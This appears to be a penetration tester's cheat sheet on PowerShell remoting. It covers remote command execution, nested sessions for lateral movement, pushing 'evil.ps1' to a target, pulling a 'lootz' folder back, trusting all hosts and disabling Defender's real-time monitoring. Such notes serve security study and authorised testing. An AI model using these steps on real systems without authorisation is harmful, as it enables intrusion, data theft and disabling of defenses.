Check the language mode:
$ExecutionContext.SessionState.LanguageMode
Check the version:
$PSVersionTable.PSVersion
WinRM access is governed by the Remote Management Users group. If we have access, easily checked remotely by probing with CrackMapExec, Invoke-Command
allows for running remote commands:
Invoke-Command -ComputerName target -Credential Credential -ScriptBlock {whoami}
We can also enter an SSH-like session with PowerShell:
Enter-PSSession -ComputerName target -Credential $Credential
Sessions can also be set to variables and run in the background:
$sess = New-PSSession -ComputerName target -Credential $Credential
Background sessions can be listed with:
Get-PSSession
Enter a PS Session with:
Enter-PSSession -id #
Removing sessions can be done with:
Exit-PSSession
in an active session, or
Get-PSSession | Disconnect-PSSession
to kill all background sessions.
Copy-Item
facilitates moving files using -ToSession
and -FromSession
:
Copy-Item -ToSession $sess -Path "C:\Users\Administrator\Desktop\" -Destination "C:\Users\Administrator\Desktop\evil.ps1" -Recurse
Copy-Item -FromSession $sess -Path "C:\Users\Administrator\Desktop\lootz\" -Destination "C:\Users\Administrator\Desktop\" -Recurse
You just can't copy from one session to another.
We can use PS Remoting to execute commands on a secondary remote machine for lateral movement or moving deeper into a network.
Invoke-Command
can be nested to execute a command on Computer A which then executes a command on Computer B.
However, using PSSession for this may lead to certain commands failing due what Microsoft calls the "double hop problem."
"...will fail because you are trying to make a remote operation from an environment which is already using a remote connection – this is known as the “double-hop” problem."
When a nested PSSession is desired, enable CredSSP to allow delgation of creds on to the next machine.
First, enable remoting in an administrative PowerShell window:
Enable-PSRemoting -Force
Check WinRM:
Set-Service WinRM -StartMode Automatic
Get-WmiObject -Class win32_service | Where-Object {$_.name -like "WinRM"}
Trust all (*) hosts so we can use IP addresses instead of hostnames:
Set-Item WSMan:localhost\client\trustedhosts -value *
Get-Item WSMan:\localhost\Client\TrustedHosts
Check age of Defender's AV signatures:
Get-MpComputerStatus | Select AntivirusSignature*
Disable Defender:
Set-MpPreference -DisableRealtimeMonitoring $true